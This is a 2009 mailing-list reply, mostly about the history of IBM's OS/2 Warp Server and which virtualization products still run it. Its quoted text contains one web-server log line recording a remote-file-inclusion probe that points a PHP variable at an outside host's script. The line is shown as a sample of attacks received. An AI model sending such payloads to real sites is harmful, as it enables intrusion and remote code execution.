Software, utility, or script to block automatically these cracker attacks

Jose R R jose.r.r at metztli.com
Wed Aug 5 20:18:48 UTC 2009

On Wed, Aug 5, 2009 at 12:45 PM, mark<m.roth2006 at rcn.com> wrote:
> Jose R R wrote:
>>> Although I go through my logs fairly often and update my scripts on an
>>> regular basis, I still get cracker attacks like the ones sampled below:
>>>
>>> 222.122.6.62 - - [04/Aug/2009:08:09:52 -0700] "GET
>>> /blog/index.php/2008/06/02/os-2-warp-server-for-e-business-wseb-and?blog=4///?_SERVER[DOCUMENT_ROOT]=http://bruntil.com/cgi/id.txt?%0D?
>>>  HTTP/1.1" 400 567 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686
> <snip>
> I did notice this oddity: the name "os-2-warp-server". Lessee, IBM's OS/2 was
> *not* Warp, that was OS-3, so if they're still running Warp, that's an *OLD*
> o/s, on ancient hardware....
>
>        mark "why, yes, I did do some work with OS 2"

IBM support for OS/2 Warp Server for e-Business (WSeB) was officially
dropped on December 2006.  Continued pseudo improvements (Win32 hacks
through Odin --a semi-port of Wine) have been done by an organization
named Serenity Systems International.  In turn, this organization has
renamed OS/2 as eCS.

They have developed some hacks to make OS/2 install in multi-core
systems; however, as expected, the ancient operating system does not
take advantage of all the power in newer hardware.  It can not be
virtualized with Xen or KVM.  OS/2 could be a host or a fully
virtualized guest (read not optimal) in Connectix 5.x Virtual PC
(2005-6) --through an Odin hack implemented by Innotek (subsequently
acquired by Sun Microsystems mainly for VirtualBox).

At the moment I think that only Parallels and VirtualBox (with
hardware assisted virtualiztion support <
http://www.metztli-it.com/blog/index.php/2008/10/14/from-mainframes-to-distributed-computing?blog=4
>) continue to provide support for OS/2 and there are some reports
that there is partial support in VMware.

Hope you find the retro info useful, Mark.

--
Jose R R
http://www.metztli-it.com